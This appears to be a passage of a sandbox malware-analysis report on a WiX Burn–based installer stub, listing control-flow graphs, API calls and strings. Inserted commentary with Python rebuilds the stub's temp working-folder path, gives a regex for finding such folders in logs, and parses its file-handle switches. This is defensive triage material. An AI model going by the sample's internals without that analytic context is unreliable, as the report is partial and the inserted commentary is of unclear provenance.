                                                            • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D0558E
                                                            Strings
                                                            • engine.cpp, xrefs: 00D05345
                                                            • Failed to initialize Regutil., xrefs: 00D052C9
                                                            • Failed to initialize engine state., xrefs: 00D0526C
                                                            • Failed to parse command line., xrefs: 00D05245
                                                            • 3.11.1.2318, xrefs: 00D05384
                                                            • Invalid run mode., xrefs: 00D053F9
                                                            • Failed to initialize XML util., xrefs: 00D052F9
                                                            • Failed to get OS info., xrefs: 00D0534F
                                                            • Failed to initialize Wiutil., xrefs: 00D052E1
                                                            • Failed to initialize COM., xrefs: 00D05291
                                                            • Failed to run embedded mode., xrefs: 00D05444
                                                            • Failed to initialize core., xrefs: 00D053C3
                                                            • Failed to initialize Cryputil., xrefs: 00D052A6
                                                            • Failed to run RunOnce mode., xrefs: 00D0541C
                                                            • Failed to run per-user mode., xrefs: 00D05494
                                                            • Failed to run untrusted mode., xrefs: 00D054B6
                                                            • Failed to run per-machine mode., xrefs: 00D0546C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                            • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                            • API String ID: 3262001429-510904028
                                                            • Opcode ID: 3dca1ae9d62c6f9b8c4f8d236fe5be7fb4b5e491eacf10e42935630cc314e315
                                                            • Instruction ID: b20c82bde4491c8dcb5e25340bf4a5fe37e9b04a5441f8990ba6f9436ebff27b
                                                            • Opcode Fuzzy Hash: 3dca1ae9d62c6f9b8c4f8d236fe5be7fb4b5e491eacf10e42935630cc314e315
                                                            • Instruction Fuzzy Hash: 5AB18171D40A29ABDB31AF64AC46BEE76B4AF14310F440196FD0CA6285DB71DE84CFB1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1012 d1752a-d1756f call d2f8e0 call d0762c 1017 d17571-d17576 1012->1017 1018 d1757b-d1758c call d0c407 1012->1018 1019 d17814-d1781b call d40237 1017->1019 1024 d17598-d175a9 call d0c26e 1018->1024 1025 d1758e-d17593 1018->1025 1026 d1781c-d17821 1019->1026 1031 d175b5-d175ca call d0c4c8 1024->1031 1032 d175ab-d175b0 1024->1032 1025->1019 1028 d17823-d17824 call d45636 1026->1028 1029 d17829-d1782d 1026->1029 1028->1029 1034 d17837-d1783c 1029->1034 1035 d1782f-d17832 call d45636 1029->1035 1044 d175d6-d175e6 call d2c001 1031->1044 1045 d175cc-d175d1 1031->1045 1032->1019 1036 d17844-d17851 call d0c1bb 1034->1036 1037 d1783e-d1783f call d45636 1034->1037 1035->1034 1046 d17853-d17856 call d45636 1036->1046 1047 d1785b-d1785f 1036->1047 1037->1036 1053 d175f2-d17665 call d15c33 1044->1053 1054 d175e8-d175ed 1044->1054 1045->1019 1046->1047 1051 d17861-d17864 call d45636 1047->1051 1052 d17869-d1786d 1047->1052 1051->1052 1056 d17877-d1787f 1052->1056 1057 d1786f-d17872 call d03a16 1052->1057 1061 d17671-d17676 1053->1061 1062 d17667-d1766c 1053->1062 1054->1019 1057->1056 1063 d17678 1061->1063 1064 d1767d-d176b4 call d05602 GetCurrentProcess call d40879 call d0827b 1061->1064 1062->1019 1063->1064 1071 d176b6 1064->1071 1072 d176ce-d176e5 call d0827b 1064->1072 1073 d176bb-d176c9 call d40237 1071->1073 1078 d176e7-d176ec 1072->1078 1079 d176ee-d176f3 1072->1079 1073->1026 1078->1073 1080 d176f5-d17707 call d0821f 1079->1080 1081 d1774f-d17754 1079->1081 1089 d17713-d17723 call d03436 1080->1089 1090 d17709-d1770e 1080->1090 1083 d17774-d1777d 1081->1083 1084 d17756-d17768 call d0821f 1081->1084 1086 d17789-d1779d call d1a50c 1083->1086 1087 d1777f-d17782 1083->1087 1084->1083 1097 d1776a-d1776f 1084->1097 1099 d177a6 1086->1099 1100 d1779f-d177a4 1086->1100 1087->1086 1091 d17784-d17787 1087->1091 1103 d17725-d1772a 1089->1103 1104 d1772f-d17743 call d0821f 1089->1104 1090->1019 
1091->1086 1094 d177ac-d177af 1091->1094 1101 d177b1-d177b4 1094->1101 1102 d177b6-d177cc call d0d5a0 1094->1102 1097->1019 1099->1094 1100->1019 1101->1026 1101->1102 1109 d177d5-d177e4 call d0cbc5 1102->1109 1110 d177ce-d177d3 1102->1110 1103->1019 1104->1081 1111 d17745-d1774a 1104->1111 1113 d177e9-d177ed 1109->1113 1110->1019 1111->1019 1114 d177f6-d1780d call d0c8e6 1113->1114 1115 d177ef-d177f4 1113->1115 1114->1026 1118 d1780f 1114->1118 1115->1019 1118->1019
                                                            Strings
                                                            • WixBundleSourceProcessPath, xrefs: 00D176F8
                                                            • Failed to load catalog files., xrefs: 00D1780F
                                                            • Failed to initialize variables., xrefs: 00D17571
                                                            • Failed to set source process folder variable., xrefs: 00D17745
                                                            • Failed to parse command line., xrefs: 00D17667
                                                            • Failed to get unique temporary folder for bootstrapper application., xrefs: 00D177CE
                                                            • Failed to initialize internal cache functionality., xrefs: 00D1779F
                                                            • Failed to get source process folder from path., xrefs: 00D17725
                                                            • Failed to set original source variable., xrefs: 00D1776A
                                                            • Failed to overwrite the %ls built-in variable., xrefs: 00D176BB
                                                            • Failed to open attached UX container., xrefs: 00D1758E
                                                            • WixBundleUILevel, xrefs: 00D176D6, 00D176E7
                                                            • Failed to set source process path variable., xrefs: 00D17709
                                                            • Failed to open manifest stream., xrefs: 00D175AB
                                                            • Failed to extract bootstrapper application payloads., xrefs: 00D177EF
                                                            • WixBundleOriginalSource, xrefs: 00D17759
                                                            • WixBundleElevated, xrefs: 00D176A5, 00D176B6
                                                            • WixBundleSourceProcessFolder, xrefs: 00D17734
                                                            • Failed to load manifest., xrefs: 00D175E8
                                                            • Failed to get manifest stream from container., xrefs: 00D175CC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalInitializeSection
                                                            • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                            • API String ID: 32694325-1564579409
                                                            • Opcode ID: 8e5761592cbb90c9aaf7d2dd5f93b9fd865c8827185ed81168fe6a40d8c8c12b
                                                            • Instruction ID: 029811b71833518de0c932def0e45c01ead8119767cf4bf28374fec9f36ad9f0
                                                            • Opcode Fuzzy Hash: 8e5761592cbb90c9aaf7d2dd5f93b9fd865c8827185ed81168fe6a40d8c8c12b
                                                            • Instruction Fuzzy Hash: 2FA183B2A44615BFDB129BA4DC85FEAB77CBB04700F040266F915E7191DB70E988CBB1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1224 d0762c-d07edf InitializeCriticalSection 1225 d07ee2-d07f06 call d05623 1224->1225 1228 d07f13-d07f24 call d40237 1225->1228 1229 d07f08-d07f0f 1225->1229 1233 d07f27-d07f39 call d2e06f 1228->1233 1229->1225 1230 d07f11 1229->1230 1230->1233
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00D1756B,00D053BD,00000000,00D05445), ref: 00D0764C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalInitializeSection
                                                            • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                            • API String ID: 32694325-3635313340
                                                            • Opcode ID: 73e87a34b08795e3949ca3b6c71ac67947f9e477740b668f17a86356c8a07249
                                                            • Instruction ID: c642a0d7c1ec496f55e97f4eafe1c218f4f61d6db3db27b183688d87f1563ba4
                                                            • Opcode Fuzzy Hash: 73e87a34b08795e3949ca3b6c71ac67947f9e477740b668f17a86356c8a07249
                                                            • Instruction Fuzzy Hash: 23324CB0D126299FDBA5CF5AC9887CDFAB4BB49304F5091EED20CA6350C7B05B848F65

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1236 d182ba-d18303 call d2f8e0 1239 d18309-d18317 GetCurrentProcess call d40879 1236->1239 1240 d1847c-d18489 call d02195 1236->1240 1244 d1831c-d18329 1239->1244 1245 d18498-d184aa call d2e06f 1240->1245 1246 d1848b 1240->1246 1247 d183b7-d183c5 GetTempPathW 1244->1247 1248 d1832f-d1833e GetWindowsDirectoryW 1244->1248 1249 d18490-d18497 call d40237 1246->1249 1251 d183c7-d183d1 GetLastError 1247->1251 1252 d183ff-d18411 UuidCreate 1247->1252 1253 d18340-d1834a GetLastError 1248->1253 1254 d18378-d18389 call d0337f 1248->1254 1249->1245 1260 d183d3-d183dc 1251->1260 1261 d183de 1251->1261 1256 d18413-d18418 1252->1256 1257 d1841a-d1842f StringFromGUID2 1252->1257 1262 d18357 1253->1262 1263 d1834c-d18355 1253->1263 1274 d18395-d183ab call d036a3 1254->1274 1275 d1838b-d18390 1254->1275 1256->1249 1270 d18431-d1844b call d03821 1257->1270 1271 d1844d-d1846e call d01f13 1257->1271 1260->1261 1264 d183e0 1261->1264 1265 d183e5-d183fa call d03821 1261->1265 1266 d18359 1262->1266 1267 d1835e-d18373 call d03821 1262->1267 1263->1262 1264->1265 1265->1249 1266->1267 1267->1249 1270->1249 1284 d18470-d18475 1271->1284 1285 d18477 1271->1285 1274->1252 1286 d183ad-d183b2 1274->1286 1275->1249 1284->1249 1285->1240 1286->1249
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00D05489), ref: 00D18310
                                                              • Part of subcall function 00D40879: OpenProcessToken.ADVAPI32(?,00000008,?,00D053BD,00000000,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D40897
                                                              • Part of subcall function 00D40879: GetLastError.KERNEL32(?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D408A1
                                                              • Part of subcall function 00D40879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D4092B
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00D18336
                                                            • GetLastError.KERNEL32 ref: 00D18340
                                                            • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00D183BD
                                                            • GetLastError.KERNEL32 ref: 00D183C7
                                                            • UuidCreate.RPCRT4(?), ref: 00D18406
                                                            Strings
                                                            • Failed to get windows path for working folder., xrefs: 00D1836E
                                                            • Failed to convert working folder guid into string., xrefs: 00D18446
                                                            • Failed to create working folder guid., xrefs: 00D18413
                                                            • cache.cpp, xrefs: 00D18364, 00D183EB, 00D1843C
                                                            • %ls%ls\, xrefs: 00D18458
                                                            • Failed to copy working folder path., xrefs: 00D1848B
                                                            • Failed to get temp path for working folder., xrefs: 00D183F5
                                                            • Failed to concat Temp directory on windows path for working folder., xrefs: 00D183AD
                                                            • Failed to ensure windows path for working folder ended in backslash., xrefs: 00D1838B
                                                            • Temp\, xrefs: 00D18395
                                                            • Failed to append bundle id on to temp path for working folder., xrefs: 00D18470
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                            • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                            • API String ID: 266130487-819636856
                                                            • Opcode ID: db33b20fd311039201bb000ba42a8b18f2cc2d000151e7ef09613d903ec8ce0d
                                                            • Instruction ID: 884cf660cce48c7534ba966ac29c2c6f46c53dbef1d51632ae998fa36db59a07
                                                            • Opcode Fuzzy Hash: db33b20fd311039201bb000ba42a8b18f2cc2d000151e7ef09613d903ec8ce0d
                                                            • Instruction Fuzzy Hash: 0B411976E41325BBDB30DAA49C0AFDA776CAB14B11F044161BE48F7280EE74DD4856F1
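The d182ba block above (cache.cpp) is the working-folder setup of the bootstrapper engine this stub is built on; the WixBundle* and WixBurnMessageWindow strings in the neighbouring blocks are consistent with the WiX Burn engine. The graph reads, in order: a token query on the current process (subcall d40879 -> OpenProcessToken), then either GetWindowsDirectoryW followed by the "Temp\" string or GetTempPathW, then UuidCreate and StringFromGUID2, then the "%ls%ls\" format. The Python below is an added example, not code from this report or from the WiX project. Reading the token query as an "is this process elevated?" check, and every function name, is an assumption; what it shows is the folder path each branch produces and, on the triage side, how to pick such folders out of a list of file-write paths, which is where an analyst would look for what the stub extracted.

```python
import re
import uuid
from typing import Dict, List

# Added example, not code from the report or from the WiX project. The branch
# choice (token query -> Windows dir vs temp path) is an inference from the
# graph; helper names are invented.

WORKING_FOLDER_FORMAT = "{base}{guid}\\"   # the "%ls%ls\" string at 00D18458


def ensure_trailing_backslash(path: str) -> str:
    """The 'ensure windows path ... ended in backslash' step at 00D1838B."""
    return path if path.endswith("\\") else path + "\\"


def format_guid(guid: uuid.UUID) -> str:
    """StringFromGUID2 output shape: braces, uppercase hex, hyphenated."""
    return "{" + str(guid).upper() + "}"


def burn_working_folder(elevated: bool, windows_dir: str, temp_dir: str, guid_str: str) -> str:
    r"""Rebuild the working folder the graph constructs.

    elevated=True  -> <windows dir>\Temp\{GUID}\   (GetWindowsDirectoryW branch)
    elevated=False -> <temp path>\{GUID}\          (GetTempPathW branch)
    """
    if elevated:
        base = ensure_trailing_backslash(windows_dir) + "Temp\\"   # "Temp\" string at 00D18395
    else:
        base = ensure_trailing_backslash(temp_dir)
    return WORKING_FOLDER_FORMAT.format(base=base, guid=guid_str)


def new_working_folder(elevated: bool, windows_dir: str, temp_dir: str) -> str:
    """Same as above with a freshly generated GUID (the UuidCreate step)."""
    return burn_working_folder(elevated, windows_dir, temp_dir, format_guid(uuid.uuid4()))


# Triage side: match any path that sits under a ...\Temp\{GUID}\ working folder.
_WORKING_FOLDER_RE = re.compile(
    r"^(?P<base>.*\\Temp\\)\{(?P<guid>[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}\\"
)


def find_burn_working_folders(paths: List[str]) -> Dict[str, List[str]]:
    """Group file paths by the {GUID} working folder they sit under; unrelated paths are dropped."""
    found: Dict[str, List[str]] = {}
    for p in paths:
        m = _WORKING_FOLDER_RE.match(p)
        if m:
            found.setdefault(m.group(0), []).append(p)
    return found


# Constructed sample of file-write paths; not taken from the report.
SAMPLE_PATHS = [
    r"C:\Windows\Temp\{3F2504E0-4F89-11D3-9A0C-0305E82C3301}\bootstrapper.dll",
    r"C:\Windows\Temp\{3F2504E0-4F89-11D3-9A0C-0305E82C3301}\payload.msi",
    r"C:\Users\victim\AppData\Local\Temp\{A1B2C3D4-0000-1111-2222-333344445555}\x.exe",
    r"C:\Windows\System32\cmd.exe",
]

if __name__ == "__main__":
    for folder, files in find_burn_working_folders(SAMPLE_PATHS).items():
        print(folder, len(files))
```

The two branches are the practical point: an elevated stub works under the Windows directory's Temp folder, a non-elevated one under the user's temp path, and in both cases the per-run GUID means the folder name is never the same twice, so a detection or a forensic search should key on the `Temp\{GUID}\` shape rather than on a fixed path.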

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1287 d210fb-d21127 CoInitializeEx 1288 d2113b-d21186 call d3f483 1287->1288 1289 d21129-d21136 call d40237 1287->1289 1295 d211b0-d211d2 call d3f4a4 1288->1295 1296 d21188-d211ab call d03821 call d40237 1288->1296 1294 d2139e-d213b0 call d2e06f 1289->1294 1304 d211d8-d211e0 1295->1304 1305 d2128c-d21297 SetEvent 1295->1305 1315 d21397-d21398 CoUninitialize 1296->1315 1309 d211e6-d211ec 1304->1309 1310 d2138f-d21392 call d3f4b4 1304->1310 1306 d212d6-d212e4 WaitForSingleObject 1305->1306 1307 d21299-d212a3 GetLastError 1305->1307 1311 d212e6-d212f0 GetLastError 1306->1311 1312 d21318-d21323 ResetEvent 1306->1312 1313 d212b0 1307->1313 1314 d212a5-d212ae 1307->1314 1309->1310 1317 d211f2-d211fa 1309->1317 1310->1315 1318 d212f2-d212fb 1311->1318 1319 d212fd 1311->1319 1320 d21325-d2132f GetLastError 1312->1320 1321 d2135a-d21360 1312->1321 1322 d212b2 1313->1322 1323 d212b4-d212c4 call d03821 1313->1323 1314->1313 1315->1294 1324 d21274-d21287 call d40237 1317->1324 1325 d211fc-d211fe 1317->1325 1318->1319 1329 d21301-d21316 call d03821 1319->1329 1330 d212ff 1319->1330 1331 d21331-d2133a 1320->1331 1332 d2133c 1320->1332 1326 d21362-d21365 1321->1326 1327 d2138a 1321->1327 1322->1323 1362 d212c9-d212d1 call d40237 1323->1362 1324->1310 1334 d21200 1325->1334 1335 d21211-d21214 1325->1335 1338 d21386-d21388 1326->1338 1339 d21367-d21381 call d03821 1326->1339 1327->1310 1329->1362 1330->1329 1331->1332 1344 d21340-d21355 call d03821 1332->1344 1345 d2133e 1332->1345 1336 d21202-d21204 1334->1336 1337 d21206-d2120f 1334->1337 1340 d21216 1335->1340 1341 d2126e 1335->1341 1347 d21270-d21272 1336->1347 1337->1347 1338->1310 1339->1362 1349 d21232-d21237 1340->1349 1350 d21263-d21268 1340->1350 1351 d21240-d21245 1340->1351 1352 d21247-d2124c 1340->1352 1353 d21224-d21229 1340->1353 1354 d21255-d2125a 1340->1354 1355 d2126a-d2126c 1340->1355 1356 d2122b-d21230 1340->1356 1357 d21239-d2123e 
1340->1357 1358 d2124e-d21253 1340->1358 1359 d2125c-d21261 1340->1359 1360 d2121d-d21222 1340->1360 1341->1347 1344->1362 1345->1344 1347->1305 1347->1324 1349->1324 1350->1324 1351->1324 1352->1324 1353->1324 1354->1324 1355->1324 1356->1324 1357->1324 1358->1324 1359->1324 1360->1324 1362->1310
                                                            APIs
                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 00D2111D
                                                            • CoUninitialize.COMBASE ref: 00D21398
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 3442037557-1168358783
                                                            • Opcode ID: 8e66e43f408c54fb9ba658b2f153c940eab6b50c919ec04bfe5555be327ea433
                                                            • Instruction ID: da5ec597ce3bf5b5a3ff234280a1b3406cb54e9b7f13873cf5a69d62bf598fcb
                                                            • Opcode Fuzzy Hash: 8e66e43f408c54fb9ba658b2f153c940eab6b50c919ec04bfe5555be327ea433
                                                            • Instruction Fuzzy Hash: 5A514A3ED40271EBCF2096A8AC06E6B7A64DF71734B268366FD01FB291D665CD0085F9

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1368 d042d7-d0432e InitializeCriticalSection * 2 call d14d05 * 2 1373 d04452-d0445c call d0b48b 1368->1373 1374 d04334 1368->1374 1379 d04461-d04465 1373->1379 1375 d0433a-d04347 1374->1375 1377 d04445-d0444c 1375->1377 1378 d0434d-d04379 lstrlenW * 2 CompareStringW 1375->1378 1377->1373 1377->1375 1380 d043cb-d043f7 lstrlenW * 2 CompareStringW 1378->1380 1381 d0437b-d0439e lstrlenW 1378->1381 1382 d04474-d0447c 1379->1382 1383 d04467-d04473 call d40237 1379->1383 1380->1377 1387 d043f9-d0441c lstrlenW 1380->1387 1384 d043a4-d043a9 1381->1384 1385 d0448a-d0449f call d03821 1381->1385 1383->1382 1384->1385 1388 d043af-d043bf call d029ce 1384->1388 1397 d044a4-d044ab 1385->1397 1391 d04422-d04427 1387->1391 1392 d044b6-d044d0 call d03821 1387->1392 1403 d043c5 1388->1403 1404 d0447f-d04488 1388->1404 1391->1392 1393 d0442d-d0443d call d029ce 1391->1393 1392->1397 1393->1404 1406 d0443f 1393->1406 1401 d044ac-d044b4 call d40237 1397->1401 1401->1382 1403->1380 1404->1401 1406->1377
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D04303
                                                            • InitializeCriticalSection.KERNEL32(000000D0,?,?,00D05266,?,?,00000000,?,?), ref: 00D0430C
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00D05266,?,?,00000000,?,?), ref: 00D04352
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D0435C
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D04370
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00D05266,?,?,00000000,?,?), ref: 00D04380
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00D05266,?,?,00000000,?,?), ref: 00D043D0
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D043DA
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D043EE
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00D05266,?,?,00000000,?,?), ref: 00D043FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                            • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                            • API String ID: 3039292287-3209860532
                                                            • Opcode ID: cbaa1a7e779330029ae1b61049c11f6a501590530a6851c2ff08f9bf33a5e506
                                                            • Instruction ID: 3b78216798afc8d82ba1b41c085ed4b6c10e7082c7b39346fd19e6eca15e9b54
                                                            • Opcode Fuzzy Hash: cbaa1a7e779330029ae1b61049c11f6a501590530a6851c2ff08f9bf33a5e506
                                                            • Instruction Fuzzy Hash: 8A518FB1A40215BFCB249FA8DC86FAA776CEF14760F144116F658E72D0DBB0E950CAB4
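The d042d7 block above (engine.cpp) is the engine's command-line pass over the burn.filehandle.attached and burn.filehandle.self switches: lstrlenW on the argument and on the switch name, CompareStringW with LOCALE_INVARIANT (0x7F) and NORM_IGNORECASE (1), then a numeric parse whose failure paths carry the two error strings listed. The Python below is an added example reconstructing that parsing, not code from this report or from the WiX project; the '-' / '/' switch prefix, decimal handle values and all names are assumptions. The value is a file handle the launching process hands to the stub, so when tracing a multi-process install these switches tell you which child was given access to the bundle container without reopening it by path.

```python
from dataclasses import dataclass
from typing import Optional, Sequence

# Added example, not code from the report or from the WiX project. It mirrors the
# d042d7 graph: case-insensitive compare over len(switch) characters, then an
# '=' check and a numeric parse, with the report's two error strings.
# Switch prefix characters and decimal parsing are assumptions.

SWITCH_ATTACHED = "burn.filehandle.attached"
SWITCH_SELF = "burn.filehandle.self"


@dataclass
class BurnFileHandles:
    attached: Optional[int] = None     # handle to the bundle carrying the attached container
    self_handle: Optional[int] = None  # handle to the running bundle itself
    error: Optional[str] = None        # set instead of raising, like the HRESULT-style exits


def _switch_matches(arg_body: str, switch: str) -> bool:
    """Prefix compare over len(switch) chars, ignoring case (CompareStringW with NORM_IGNORECASE)."""
    return arg_body[:len(switch)].lower() == switch


def parse_burn_filehandle_switches(argv: Sequence[str]) -> BurnFileHandles:
    """Pull the two file-handle switches out of a command line; other arguments are ignored."""
    result = BurnFileHandles()
    for arg in argv[1:]:                      # argv[0] is the program itself
        if not arg or arg[0] not in "-/":     # assumption: switches start with '-' or '/'
            continue
        body = arg[1:]
        for switch in (SWITCH_ATTACHED, SWITCH_SELF):
            if not _switch_matches(body, switch):
                continue
            rest = body[len(switch):]
            if not rest.startswith("="):
                result.error = f"Missing required parameter for switch: {switch}"
                return result
            value = rest[1:]
            if not value.isdigit():
                result.error = f"Failed to parse file handle: '{value}'"
                return result
            if switch == SWITCH_ATTACHED:
                result.attached = int(value)
            else:
                result.self_handle = int(value)
            break
    return result


if __name__ == "__main__":
    # Constructed command line, not taken from the report.
    print(parse_burn_filehandle_switches(
        ["bundle.exe", "-burn.filehandle.attached=740", "-burn.filehandle.self=744", "-quiet"]))
```

Because the compare is a length-limited, case-insensitive prefix match, `-BURN.FILEHANDLE.SELF=744` is accepted and `-burn.filehandle.selfx` is rejected for a missing '=', which is the same shape the graph's two failure exits have.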

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
